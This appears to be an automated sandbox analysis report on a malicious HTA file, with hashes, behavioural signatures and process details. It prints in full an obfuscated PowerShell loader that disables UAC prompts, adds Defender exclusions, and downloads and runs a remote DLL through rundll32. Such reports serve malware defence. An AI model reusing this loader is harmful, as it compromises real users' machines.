Analysis
- max time kernel: 424s
- max time network: 430s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 23-06-2022 16:06
- Static task: static1
- Behavioral task: behavioral1
- Sample: etest.hta
- Resource: win7-20220414-en (windows7_x64)
- 0 signatures, 0 seconds
General
- Target: etest.hta
- Size: 99KB
- MD5: 84df3cea303f0410a2a70580b9155bf5
- SHA1: 987eed81fa0822853cb9f826994e75102e086694
- SHA256: 248b6a65b656872525904122e75bd374b772e27c2a8fc6040ec6582fd207e536
- SHA512: 610b39ec2989225794d0b12ef451bddc4bc4f3f77cd2159d9396ca425524256f17ea12b17957070a94704b5aa1a0b5fe5f915dd9d3c610aecc767315e1977616
Malware Config
Signatures
Processes:
- powershell.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"

Blocklisted process makes network request (1 IoC)
Processes:
- powershell.exe (pid 1580): flow 4

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Processes:
- mshta.exe: Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
- powershell.exe (pid 1580)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
- powershell.exe (pid 1580): Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (11 IoCs)
Processes:
- PID 1664 (mshta.exe) wrote to memory of PID 1580 (powershell.exe): 4 events
- PID 1580 (powershell.exe) wrote to memory of PID 424 (rundll32.exe): 7 events
Processes
Process 1: C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\etest.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie 
$PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac2⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Process 3: C:\Windows\SysWOW64\rundll32.exe
Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/424-58-0x0000000000000000-mapping.dmp
- memory/1580-54-0x0000000000000000-mapping.dmp
- memory/1580-55-0x00000000756E1000-0x00000000756E3000-memory.dmp (filesize 8KB)
- memory/1580-56-0x0000000072150000-0x00000000726FB000-memory.dmp (filesize 5.7MB)
- memory/1580-57-0x0000000072150000-0x00000000726FB000-memory.dmp (filesize 5.7MB)
- memory/1580-60-0x0000000072150000-0x00000000726FB000-memory.dmp (filesize 5.7MB)